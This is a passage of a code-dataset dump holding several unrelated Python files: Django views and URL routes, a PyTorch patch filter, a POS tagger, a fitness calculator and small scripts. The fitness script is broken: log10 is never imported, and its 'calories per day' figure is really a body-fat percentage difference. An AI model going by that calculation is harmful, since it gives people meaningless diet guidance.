commited\")\n\n","repo_name":"lidamsoukaina/Multi-agent_System","sub_path":"pw_argumentation.py","file_name":"pw_argumentation.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10273229951","text":"\"\"\"View module for handling requests for boards\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework.decorators import action\nfrom rest_framework.authtoken.models import Token\nfrom jobseekerapi.models import CustomPrepInfo, Seeker, InterviewPrep\n\n\nclass CustomPrepView(ViewSet):\n \"\"\"Board View\"\"\"\n\n def retrieve(self, request, pk):\n \"\"\"Handle GET requests for a single Board\n Returns:\n Response -- JSON Serialized Board\"\"\"\n try:\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n except:\n return Response(\n {\"message\": \"The custom prep info you requested does not exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n serializer = CustomPrepSerializer(custom_prep_info)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def list(self, request):\n custom_prep_infos = CustomPrepInfo.objects.all()\n serializer = CustomPrepSerializer(custom_prep_infos, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def create(self, request):\n\n interview_prep = InterviewPrep.objects.get(pk=request.data[\"prep\"])\n\n custom_prep_info = CustomPrepInfo.objects.create(\n prep=interview_prep,\n title = request.data[\"title\"],\n description = request.data[\"description\"],\n content = request.data[\"content\"],\n )\n\n serializer = CustomPrepSerializer(custom_prep_info)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def update(self, request, pk):\n\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n custom_prep_info.title = request.data[\"title\"]\n custom_prep_info.description = request.data[\"description\"]\n custom_prep_info.content = request.data[\"content\"]\n\n interview_prep = InterviewPrep.objects.get(pk=request.data[\"prep_id\"])\n custom_prep_info.prep_id = interview_prep\n custom_prep_info.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n custom_prep_info = CustomPrepInfo.objects.get(pk=pk)\n custom_prep_info.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n\nclass SeekerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Seeker\n fields = (\"id\",\"current_role\", \"elevator_pitch\")\n\nclass CustomPrepSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CustomPrepInfo\n fields = (\"id\", \"prep_id\", \"title\", \"description\", \"content\")","repo_name":"jvw3/Job-Seeker-Server","sub_path":"jobseekerapi/views/custom_preps.py","file_name":"custom_preps.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"13652286899","text":"from process_config import notification_registration_client\nfrom base_doc import BaseDoc\n\n\nclass Notifications(BaseDoc):\n def undo(self):\n rev_list = self.get_rev_list()\n result = ''\n if self.action == 'add':\n result = self.undo_new()\n elif self.action == 'delete':\n result = self.undo_delete()\n else:\n result = self.undo_edit()\n return result\n\n def undo_new(self):\n self.doc['hidden'] = True\n ret = self.db.save_doc(self.doc)\n hidden = self.db.get(self.doc['_id'], rev=ret['rev'])\n notification_registration_client.delete(hidden, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n\n def undo_delete(self):\n del self.doc['hidden']\n self.doc['status'] = 'done'\n self.db.save_doc(self.doc, force_update=True)\n notification_registration_client.registration(self.doc, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n\n def undo_edit(self):\n rev_list = self.get_rev_list()\n prev = self.db.get(self.doc['_id'], rev=rev_list[0])\n self.doc['user'] = prev['user']\n ret = self.db.save_doc(self.doc)\n mod = self.db.get(self.doc['_id'], rev=ret['rev'])\n notification_registration_client.edit(mod, from_undo=True)\n updated = self.db.get(self.doc['_id'])\n return updated['_rev']\n","repo_name":"rjspencer1989/phd_code","sub_path":"undo/doc_types/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5391278003","text":"# Define the target time frame and other relevant variables\ntarget_time_frame = 8 # weeks\n\n# Prompt the user for the target body fat percentage, current weight, age, and sex\ntarget_body_fat_percentage = float(\n input(\"Enter your target body fat percentage: \"))\ncurrent_weight = float(input(\"Enter your current weight in kilograms: \"))\ncurrent_age = float(input(\"Enter your current age: \"))\ncurrent_sex = input(\"Enter your sex (male or female): \")\n\n# Prompt the user for the relevant measurements\nheight = float(input(\"Enter your height in centimeters: \"))\nwaist = float(input(\"Enter your waist circumference in centimeters: \"))\nhip = float(input(\"Enter your hip circumference in centimeters: \"))\nneck = float(input(\"Enter your neck circumference in centimeters: \"))\n\n# Calculate the current body fat percentage using the U.S. Navy method\n# https://en.wikipedia.org/wiki/Body_fat_percentage#Measurement\nbody_fat_percentage = 86.010 * \\\n (1.20 * (log10(waist - neck) - log10(height))) - \\\n 70.041 * (log10(height)) + 36.76\nstarting_body_fat_percentage = round(body_fat_percentage, 2)\n\n# Calculate the total number of calories needed to maintain the current weight using the Harris-Benedict equation\nif current_sex == \"male\":\n bmr = 66.5 + (13.75 * current_weight) + \\\n (5.003 * height) - (6.755 * current_age)\nelse:\n bmr = 655.1 + (9.563 * current_weight) + \\\n (1.850 * height) - (4.676 * current_age)\ntotal_calories_needed = bmr * 1.2 # factor in slight activity level\n\n# Determine the number of calories that need to be burned per week to reach the target body fat percentage in the target time frame\ncalories_to_burn_per_week = (\n target_body_fat_percentage - starting_body_fat_percentage) / target_time_frame\n\n# Calculate the number of calories that need to be burned per day to reach the target body fat percentage in the target time frame\ncalories_to_burn_per_day = calories_to_burn_per_week / 7\n\n# Print the results\nprint(\"Your current body fat percentage is\", starting_body_fat_percentage, \"%\")\nprint(\"To reach a body fat percentage of\",\n target_body_fat_percentage, \"in\", target_time_frame, \"weeks,\")\nprint(\"you will need to burn\", calories_to_burn_per_day,\n \"calories per day on average.\")\n","repo_name":"TJBreezy/Health-and-Fitness-Programs","sub_path":"fitnesspal.py","file_name":"fitnesspal.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40639410682","text":"import torch\nimport torch.nn as nn\n\n\nclass PatchConv(nn.Module):\n def __init__(self, num_channels, patch_size):\n super(PatchConv, self).__init__()\n self.conv = nn.Conv2d(num_channels, 1, kernel_size=patch_size, stride=patch_size)\n\n def forward(self, x):\n batch_size, num_patches, num_channels, patch_height, patch_width = x.shape\n output = torch.zeros(batch_size, num_patches)\n for i in range(batch_size):\n for j in range(num_patches):\n output[i, j] = self.conv(x[i, j, :, :, :])\n\n return output\n\n\nclass ImagePatchFilter(nn.Module):\n def __init__(self, patch_size: int = 8, top_k: int = 8, heuristic: str = 'contrast', probabilistic: bool = True,\n prob: float = 0.5, decay_rate: float = 0.0, batch_size: int = 0, verbose: bool = False):\n \"\"\"\n The ImagePatchFilter class takes in a patch size, top_k, and probabilistic and returns a super class of the\n ImagePatchFilter class\n\n :param patch_size: The size of the patch to be extracted from the image, defaults to 8 (optional)\n :param top_k: The number of patches to select, defaults to 8 (optional)\n :param probabilistic: If True, the filter will return a probability distribution over the patches. If False, it will\n return the top k patches, defaults to True (optional)\n \"\"\"\n super(ImagePatchFilter, self).__init__()\n # Set the path prob\n self.counter = 0\n # Set the prob\n self.prob = prob\n # Set the batch size\n self.batch_size = batch_size\n # Set the decay rate\n self.decay_rate = decay_rate\n # Store the current epoch variable\n self.current_epoch = 0\n # Set the patch size\n self.patch_size = patch_size\n # Set the top k\n self.top_k = top_k\n # Set the probabilistic flag\n self.probabilistic = probabilistic\n # Set the verbose flag\n self.verbose = verbose\n # Set the heuristic type\n self.heuristic = heuristic\n\n def update_epoch(self, epoch):\n self.current_epoch = epoch\n\n def divide_in_patches(self, image):\n # Get the shape of the image tensor\n batch_size, num_channels, height, width = image.size()\n\n # Calculate the number of patches in the height and width dimensions\n num_patches_height = height // self.patch_size\n num_patches_width = width // self.patch_size\n\n # Reshape the image tensor to divide it into patches\n patches = image.view(batch_size, num_channels, num_patches_height, self.patch_size, num_patches_width,\n self.patch_size)\n patches = patches.permute(0, 2, 4, 1, 3, 5).contiguous()\n patches = patches.view(batch_size, num_patches_height * num_patches_width, num_channels, self.patch_size,\n self.patch_size)\n\n return patches\n\n def get_distribution_vector(self, patches, mode='contrast'):\n patches = patches.float()\n\n if mode == 'contrast':\n max_value, _ = torch.max(patches, dim=3)\n min_value, _ = torch.min(patches, dim=3)\n max_value, _ = torch.max(max_value, dim=3)\n min_value, _ = torch.min(min_value, dim=3)\n max_value, _ = torch.max(max_value, dim=2)\n min_value, _ = torch.min(min_value, dim=2)\n contrast_values = (max_value - min_value + 1e-8) / (max_value + min_value)\n\n return contrast_values\n\n if mode == 'entropy':\n entropy_values = torch.special.entr(patches + 1e-8).mean(dim=[2, 3, 4])\n\n return entropy_values\n\n if mode == 'variance':\n variance_values = patches.var(dim=[3, 4]).mean(dim=2)\n\n return variance_values\n\n if mode == 'conv':\n conv_operator = PatchConv(num_channels=patches.shape[2], patch_size=patches.shape[3])\n conv_values = conv_operator(patches)\n\n return conv_values\n\n def get_topk_patches_mask(self, patches, distribution_values):\n \"\"\"\n For each image in the batch, we get the top k patches based on the contrast values, and set the rest of the\n patches to zero\n\n :param patches: the patches extracted from the image\n :param distribution_values: a tensor of shape (batch_size, num_patches)\n :return: The patches that have the highest contrast values.\n \"\"\"\n # Get the shape of the patches tensor\n batch_size, num_patches, _, _, _ = patches.shape\n\n # Initialize a mask tensor to zero\n mask = torch.zeros_like(patches)\n\n # Loop over the patches and select the top k patches\n for i in range(batch_size):\n # Get the top k patches\n if self.probabilistic:\n # Sample patches from the probability distribution described by the contrast values\n probs = (distribution_values[i, :] - distribution_values[i, :].min()) / \\\n (distribution_values[i, :].max() - distribution_values[i, :].min())\n probs = torch.nan_to_num(probs, nan=1e-6, posinf=1e-6, neginf=1e-6)\n topk_patches_indices = torch.multinomial(probs, num_samples=self.top_k, replacement=False)\n else:\n # Select the top-k patches based on their contrast values\n topk_patches_indices = torch.topk(distribution_values[i, :],\n self.top_k, largest=True, sorted=True).indices\n # Set the mask to 1 for the top k patches\n mask[i, topk_patches_indices, :, :, :] = 1\n\n # Apply the mask to the patches tensor\n masked_patches = patches * mask\n\n return masked_patches\n\n def update_epoch(self):\n self.current_epoch = self.current_epoch + 1\n\n def update_branch_prob(self, epoch):\n if self.training:\n self.prob = self.prob / (1 + self.decay_rate * epoch)\n\n def random_binary(self, probability):\n \"\"\"\n Returns 0 or 1 with probability `probability`.\n \"\"\"\n distribution = torch.distributions.Bernoulli(probability)\n binary_value = distribution.sample()\n return binary_value.int()\n\n def forward(self, images):\n if not self.training:\n return images\n\n if self.counter == 0:\n print(\"\\nCurrent Epoch: \", self.current_epoch)\n print(\"Probability: \", self.prob)\n else:\n if self.counter % self.batch_size == 0:\n self.update_epoch()\n self.update_branch_prob(self.current_epoch)\n print(\"\\nCurrent Epoch: \", self.current_epoch)\n print(\"Probability: \", self.prob)\n self.counter = 0\n\n self.counter += 1\n flag = self.random_binary(self.prob)\n if flag:\n # Divide the input image into patches\n patches = self.divide_in_patches(images)\n # Calculate the contrast value for each patch\n contrast_values = self.get_distribution_vector(patches, self.heuristic)\n # Create a mask to set the non-selected patches to zero\n mask = self.get_topk_patches_mask(patches, contrast_values)\n # Reshape the mask tensor to match the input image tensor shape\n batch_size, num_patches, num_channels, patch_height, patch_width = mask.size()\n height = num_patches // (images.size(-1) // self.patch_size)\n width = num_patches // (images.size(-2) // self.patch_size)\n mask = mask.view(batch_size, height, width, num_channels, patch_height, patch_width)\n mask = mask.permute(0, 3, 1, 4, 2, 5).contiguous()\n mask = mask.view(batch_size, num_channels, height * patch_height, width * patch_width)\n # Return the filtered image\n return mask\n else:\n # Return the unfiltered image\n return images\n","repo_name":"MattiaLimone/HuggingGreen","sub_path":"src/hvit/decision_block/filter_block.py","file_name":"filter_block.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9668450640","text":"import matplotlib.pyplot as plt\n\ndef lectura(nombre):\n ar = open(nombre)\n fecha = ar.readline()\n fecha = fecha.rstrip('\\n')\n X = fecha.split(',')\n# X = ((ar.readline()).rstrip('\\n')).split(',')\n XX = list(range(len(X)))\n casos = ar.readline()\n casos = casos.rstrip('\\n')\n casos = casos.split(',')\n Y = []\n for elem in casos:\n Y.append(float(elem))\n return X, Y\n\ndef graficar(X, Y):\n plt.plot(X, Y)\n plt.show()\n\n\n\ndef finalizar(X, Y):\n print('Son', len(Y), 'dias' )\n\nif __name__ == \"__main__\":\n X, Y = lectura('TotalesNacionalesResumen.csv')\n x1, y1 = datos_por_mes(X, Y)\n # graficar(X, Y)\n # finalizar(X, Y)\n# xr, yr = resumen_por mes(X, Y)\n","repo_name":"Matias-Gutierrez/practica-con-python","sub_path":"clase 2 semestre/clase 5/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70576685955","text":"# O(n3) time | O(n2) space\n\nclass Solution:\n \n @staticmethod\n def maxCoins_recursive(nums: List[int]) -> int:\n cache = {}\n nums = [1] + nums + [1]\n\n def dfs(l, r):\n if l > r:\n return 0\n if (l, r) in cache:\n return cache[(l, r)]\n\n cache[(l, r)] = 0\n for i in range(l, r + 1):\n coins = nums[l - 1] * nums[i] * nums[r + 1]\n coins += dfs(l, i - 1) + dfs(i + 1, r)\n cache[(l, r)] = max(cache[(l, r)], coins)\n return cache[(l, r)]\n\n return dfs(1, len(nums) - 2)\n \n @staticmethod\n def maxCoins_iterative(nums: List[int]) -> int:\n cache = {}\n nums = [1] + nums + [1]\n\n for offset in range(2, len(nums)):\n for left in range(len(nums) - offset):\n right = left + offset\n for pivot in range(left + 1, right):\n coins = nums[left] * nums[pivot] * nums[right]\n coins += cache.get((left, pivot), 0) + cache.get((pivot, right), 0)\n cache[(left, right)] = max(coins, cache.get((left, right), 0))\n return cache.get((0, len(nums) - 1), 0)\n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/dynamic_programming/burst_balloons.py","file_name":"burst_balloons.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"6532483603","text":"from buildrelease.release_build import buildRelease\nimport sys, os, os.path\nimport getopt\n\ndef _captureVersion():\n\t\"\"\" get the dojo version info for the build\"\"\"\n\tversion = \"missing\"\n\ttmp = file ( os.path.normpath(os.path.join(os.path.dirname(__file__),'prmax/config/app.cfg')) )\n\tfor l in tmp.readlines():\n\t\tif l.find ( \"prmax.dojoversion =\" ) != -1:\n\t\t\tversion = l.split(\"\\\"\")[1]\n\t\t\tbreak\n\treturn version\n\n\nif __name__=='__main__':\n\topts, args = getopt.getopt(sys.argv[1:],\"\" , [\"live\",\"test\"])\n\tdone = False\n\tfor o, a in opts:\n\t\tif o in (\"--live\",):\n\t\t\tbuildRelease(True,True,_captureVersion())\n\t\t\tdone = True\n\t\tif o in (\"--test\",):\n\t\t\tbuildRelease(True,False,_captureVersion())\n\t\t\tdone = True\n\tif not done:\n\t\tprint (\"Missing Environment\")","repo_name":"meanang123/prmax","sub_path":"prmax/setup_dojo.py","file_name":"setup_dojo.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18685169300","text":"import os\nimport joblib\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nMODEL = os.path.join(os.path.realpath('..'), 'models')\nTABLE = {}\n\n\ndef mapping(data):\n values = data.split(' ')\n value = values[1]\n value = re.sub(r'[0-9]+', '', value)\n value = re.sub(r'[,.`´\\'\\\"!?;:*@%$()=+\\\\/_-]+', '', value)\n\n tag = values[0]\n tag = re.sub(r'[0-9]+', '', tag)\n tag = re.sub(r'[,.`´\\'\\\"!?;:*@%$()=+\\\\/_-]+', '', tag)\n if value == '' or tag == '':\n return ''\n else:\n return tag + ' ' + value\n\n\ndef read_dataset(path_dataset):\n print(\"Reading dataset from path\", path_dataset)\n file = open(path_dataset, 'r')\n data = {}\n\n for s in file:\n for c in range(len(s)):\n if s[c] == '(':\n value = []\n c += 1\n while s[c] != ')' and c < len(s) - 1:\n\n if s[c] == '(':\n value.clear()\n break\n else:\n value.append(s[c])\n c += 1\n if s[c] == ')':\n str1 = ''.join(value)\n str1 = mapping(str1)\n if str1 != '':\n if str1 in data:\n data[str1] += 1\n else:\n data[str1] = 1\n\n file.close()\n return data\n\n\ndef classify(value):\n candidates = []\n for key in TABLE:\n values = key.split(\" \")\n if values[1] == value:\n candidates.append([values[0], TABLE[key]])\n\n # Se não houver candidados retornar a tag mais comum\n best_candidate = ''\n value_best_candidate = -1\n if len(candidates) == 0:\n for key in TABLE:\n values = key.split(\" \")\n if TABLE[key] > value_best_candidate:\n value_best_candidate = TABLE[key]\n best_candidate = values[0]\n return best_candidate\n else:\n for candidate in candidates:\n if candidate[1] > value_best_candidate:\n best_candidate = candidate[0]\n value_best_candidate = candidate[1]\n return best_candidate\n\n\ndef print_confusion_matrix(tags, confusion_matrix):\n\n matrix = \" \"\n for i in range(len(tags)):\n matrix = matrix + tags[i] + \" \"\n matrix += \"\\n\"\n\n for i in range(len(tags)):\n line = tags[i] + \" \"\n for j in range(len(tags)):\n print(i, j)\n line += str(confusion_matrix[i][j])\n line += \" \"\n matrix = matrix + line + \"\\n\"\n print(matrix)\n\nif __name__ == '__main__':\n path = os.path.join(os.path.realpath('..'), 'data', 'traindata')\n\n if 'table.joblib' in os.listdir(MODEL):\n TABLE = joblib.load(os.path.join(MODEL, '{}.joblib'.format('table')))\n else:\n TABLE = read_dataset(path)\n joblib.dump(TABLE, os.path.join(MODEL, '{}.joblib'.format('table')))\n\n path_test = os.path.join(os.path.realpath('..'), 'data', 'test')\n test_data = read_dataset(path_test)\n\n total = 0\n acertos = 0\n erros = 0\n\n tags = {}\n count = 0\n for key in test_data:\n values = key.split(\" \")\n if values[0] not in tags:\n tags[values[0]] = count\n count += 1\n for key in TABLE:\n values = key.split(\" \")\n if values[0] not in tags:\n tags[values[0]] = count\n count += 1\n print(tags)\n\n tags_list = []\n for key in tags:\n tags_list.append(key)\n\n confusion_matrix = np.full((len(tags_list), len(tags_list)), 0)\n for key in test_data:\n values = key.split(\" \")\n word = values[1]\n classified = classify(word)\n total += test_data[key]\n\n index_classified = tags[classified]\n index_original = tags[values[0]]\n confusion_matrix[index_classified][index_original] += 1\n\n if classified == values[0]:\n acertos += test_data[key]\n else:\n erros += test_data[key]\n\n print_confusion_matrix(tags_list, confusion_matrix)\n print('total:', total)\n print('acertos:', acertos)\n print('erros:', erros)\n print('accuracia:', acertos/total)\n\n df_cm = pd.DataFrame(confusion_matrix, index=[i for i in tags_list],\n columns=[i for i in tags_list])\n plt.figure(figsize=(len(tags_list), len(tags_list)))\n sns_plot = sns.heatmap(df_cm, annot=True, cmap='coolwarm', linecolor='white', linewidths=1)\n figure = sns_plot.get_figure()\n figure.savefig('output.png', dpi=100)\n # fig, ax = plt.subplots()\n # im = ax.imshow(confusion_matrix)\n #\n # # We want to show all ticks...\n # ax.set_xticks(np.arange(len(tags_list)))\n # ax.set_yticks(np.arange(len(tags_list)))\n # # ... and label them with the respective list entries\n # ax.set_xticklabels(tags_list)\n # ax.set_yticklabels(tags_list)\n #\n # # Rotate the tick labels and set their alignment.\n # plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n # rotation_mode=\"anchor\")\n #\n # # Loop over data dimensions and create text annotations.\n # for i in range(len(tags_list)):\n # for j in range(len(tags_list)):\n # text = ax.text(j, i, confusion_matrix[i, j],\n # ha=\"center\", va=\"center\", color=\"w\")\n #\n # ax.set_title(\"Confusion Matrix\")\n # fig.tight_layout()\n # plt.savefig(\"confusion_matrix.png\")\n\n\n\n","repo_name":"gbrsouza/NLP","sub_path":"module1/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74629294273","text":"from django.apps import apps\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom django.urls import include, path\nfrom django.views.i18n import JavaScriptCatalog\n\nimport calendarweek.django\nimport debug_toolbar\nfrom ckeditor_uploader import views as ckeditor_uploader_views\nfrom django_js_reverse.views import urls_js\nfrom health_check.urls import urlpatterns as health_urls\nfrom oauth2_provider.views import ConnectDiscoveryInfoView\nfrom rules.contrib.views import permission_required\nfrom two_factor.urls import urlpatterns as tf_urls\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", include(\"django_prometheus.urls\")),\n path(settings.MEDIA_URL.removeprefix(\"/\"), include(\"titofisto.urls\")),\n path(\"manifest.json\", views.ManifestView.as_view(), name=\"manifest\"),\n path(\"serviceworker.js\", views.ServiceWorkerView.as_view(), name=\"service_worker\"),\n path(\"offline/\", views.OfflineView.as_view(), name=\"offline\"),\n path(\"about/\", views.about, name=\"about_aleksis\"),\n path(\"accounts/signup/\", views.AccountRegisterView.as_view(), name=\"account_signup\"),\n path(\"accounts/logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n path(\n \"accounts/password/change/\",\n views.CustomPasswordChangeView.as_view(),\n name=\"account_change_password\",\n ),\n path(\"accounts/\", include(\"allauth.urls\")),\n path(\"invitations/send-invite\", views.InvitePerson.as_view(), name=\"invite_person\"),\n path(\n \"invitations/code/enter\", views.EnterInvitationCode.as_view(), name=\"enter_invitation_code\"\n ),\n path(\n \"invitations/code/generate\",\n views.GenerateInvitationCode.as_view(),\n name=\"generate_invitation_code\",\n ),\n path(\"invitations/\", include(\"invitations.urls\")),\n path(\n \"accounts/social/connections//delete\",\n views.SocialAccountDeleteView.as_view(),\n name=\"delete_social_account_by_pk\",\n ),\n path(\"admin/\", admin.site.urls),\n path(\"admin/uwsgi/\", include(\"django_uwsgi.urls\")),\n path(\"data_management/\", views.data_management, name=\"data_management\"),\n path(\"status/\", views.SystemStatus.as_view(), name=\"system_status\"),\n path(\"account/login/\", views.LoginView.as_view(), name=\"login\"),\n path(\"\", include(tf_urls)),\n path(\"celery_progress//\", views.CeleryProgressView.as_view(), name=\"task_status\"),\n path(\"accounts/logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n path(\"school_terms/\", views.SchoolTermListView.as_view(), name=\"school_terms\"),\n path(\"school_terms/create/\", views.SchoolTermCreateView.as_view(), name=\"create_school_term\"),\n path(\"school_terms//\", views.SchoolTermEditView.as_view(), name=\"edit_school_term\"),\n path(\"persons\", views.persons, name=\"persons\"),\n path(\"person/\", views.person, name=\"person\"),\n path(\"person/create/\", views.CreatePersonView.as_view(), name=\"create_person\"),\n path(\"person//\", views.person, name=\"person_by_id\"),\n path(\"person//edit/\", views.EditPersonView.as_view(), name=\"edit_person_by_id\"),\n path(\"person//delete/\", views.delete_person, name=\"delete_person_by_id\"),\n path(\"person//invite/\", views.InvitePersonByID.as_view(), name=\"invite_person_by_id\"),\n path(\"groups\", views.groups, name=\"groups\"),\n path(\"groups/additional_fields\", views.additional_fields, name=\"additional_fields\"),\n path(\"groups/child_groups/\", views.groups_child_groups, name=\"groups_child_groups\"),\n path(\n \"groups/additional_field//edit\",\n views.edit_additional_field,\n name=\"edit_additional_field_by_id\",\n ),\n path(\n \"groups/additional_field/create\",\n views.edit_additional_field,\n name=\"create_additional_field\",\n ),\n path(\n \"groups/additional_field//delete\",\n views.delete_additional_field,\n name=\"delete_additional_field_by_id\",\n ),\n path(\"group/create\", views.edit_group, name=\"create_group\"),\n path(\"group/\", views.group, name=\"group_by_id\"),\n path(\"group//edit\", views.edit_group, name=\"edit_group_by_id\"),\n path(\"group//delete\", views.delete_group, name=\"delete_group_by_id\"),\n path(\"\", views.index, name=\"index\"),\n path(\"notifications/\", views.NotificationsListView.as_view(), name=\"notifications\"),\n path(\"dashboard/edit/\", views.EditDashboardView.as_view(), name=\"edit_dashboard\"),\n path(\n \"notifications/mark-read/\",\n views.notification_mark_read,\n name=\"notification_mark_read\",\n ),\n path(\"groups/group_type/create\", views.edit_group_type, name=\"create_group_type\"),\n path(\n \"groups/group_type//delete\",\n views.delete_group_type,\n name=\"delete_group_type_by_id\",\n ),\n path(\"groups/group_type//edit\", views.edit_group_type, name=\"edit_group_type_by_id\"),\n path(\"groups/group_types\", views.group_types, name=\"group_types\"),\n path(\"announcements/\", views.announcements, name=\"announcements\"),\n path(\"announcement/create/\", views.announcement_form, name=\"add_announcement\"),\n path(\"announcement/edit//\", views.announcement_form, name=\"edit_announcement\"),\n path(\"announcement/delete//\", views.delete_announcement, name=\"delete_announcement\"),\n path(\"search/searchbar/\", views.searchbar_snippets, name=\"searchbar_snippets\"),\n path(\"search/\", views.PermissionSearchView.as_view(), name=\"haystack_search\"),\n path(\"maintenance-mode/\", include(\"maintenance_mode.urls\")),\n path(\"impersonate/\", include(\"impersonate.urls\")),\n path(\n \".well-known/openid-configuration\",\n ConnectDiscoveryInfoView.as_view(),\n name=\"oidc_configuration\",\n ),\n path(\"oauth/applications/\", views.OAuth2ListView.as_view(), name=\"oauth2_applications\"),\n path(\n \"oauth/applications/register/\",\n views.OAuth2RegisterView.as_view(),\n name=\"register_oauth_application\",\n ),\n path(\n \"oauth/applications//\", views.OAuth2DetailView.as_view(), name=\"oauth2_application\"\n ),\n path(\n \"oauth/applications//delete/\",\n views.OAuth2DeleteView.as_view(),\n name=\"delete_oauth2_application\",\n ),\n path(\n \"oauth/applications//edit/\",\n views.OAuth2EditView.as_view(),\n name=\"edit_oauth2_application\",\n ),\n path(\"oauth/\", include(\"oauth2_provider.urls\", namespace=\"oauth2_provider\")),\n path(\"__i18n__/\", include(\"django.conf.urls.i18n\")),\n path(\n \"ckeditor/upload/\",\n permission_required(\"core.ckeditor_upload_files_rule\")(ckeditor_uploader_views.upload),\n name=\"ckeditor_upload\",\n ),\n path(\n \"ckeditor/browse/\",\n permission_required(\"core.ckeditor_upload_files_rule\")(ckeditor_uploader_views.browse),\n name=\"ckeditor_browse\",\n ),\n path(\"select2/\", include(\"django_select2.urls\")),\n path(\"jsreverse.js\", urls_js, name=\"js_reverse\"),\n path(\"calendarweek_i18n.js\", calendarweek.django.i18n_js, name=\"calendarweek_i18n_js\"),\n path(\"gettext.js\", JavaScriptCatalog.as_view(), name=\"javascript-catalog\"),\n path(\n \"preferences/site/\", views.preferences, {\"registry_name\": \"site\"}, name=\"preferences_site\"\n ),\n path(\n \"preferences/person/\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group/\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site//\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person//\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group//\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site///\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person///\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group///\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\n \"preferences/site//\",\n views.preferences,\n {\"registry_name\": \"site\"},\n name=\"preferences_site\",\n ),\n path(\n \"preferences/person//\",\n views.preferences,\n {\"registry_name\": \"person\"},\n name=\"preferences_person\",\n ),\n path(\n \"preferences/group//\",\n views.preferences,\n {\"registry_name\": \"group\"},\n name=\"preferences_group\",\n ),\n path(\"health/\", include(health_urls)),\n path(\"health/pdf/\", views.TestPDFGenerationView.as_view(), name=\"test_pdf\"),\n path(\n \"data_check/\",\n views.DataCheckView.as_view(),\n name=\"check_data\",\n ),\n path(\n \"data_check/run/\",\n views.RunDataChecks.as_view(),\n name=\"data_check_run\",\n ),\n path(\n \"data_check///\",\n views.SolveDataCheckView.as_view(),\n name=\"data_check_solve\",\n ),\n path(\"dashboard_widgets/\", views.DashboardWidgetListView.as_view(), name=\"dashboard_widgets\"),\n path(\n \"dashboard_widgets//edit/\",\n views.DashboardWidgetEditView.as_view(),\n name=\"edit_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets//delete/\",\n views.DashboardWidgetDeleteView.as_view(),\n name=\"delete_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets///new/\",\n views.DashboardWidgetCreateView.as_view(),\n name=\"create_dashboard_widget\",\n ),\n path(\n \"dashboard_widgets/default/\",\n views.EditDashboardView.as_view(),\n {\"default\": True},\n name=\"edit_default_dashboard\",\n ),\n path(\n \"permissions/global/user/\",\n views.UserGlobalPermissionsListBaseView.as_view(),\n name=\"manage_user_global_permissions\",\n ),\n path(\n \"permissions/global/group/\",\n views.GroupGlobalPermissionsListBaseView.as_view(),\n name=\"manage_group_global_permissions\",\n ),\n path(\n \"permissions/object/user/\",\n views.UserObjectPermissionsListBaseView.as_view(),\n 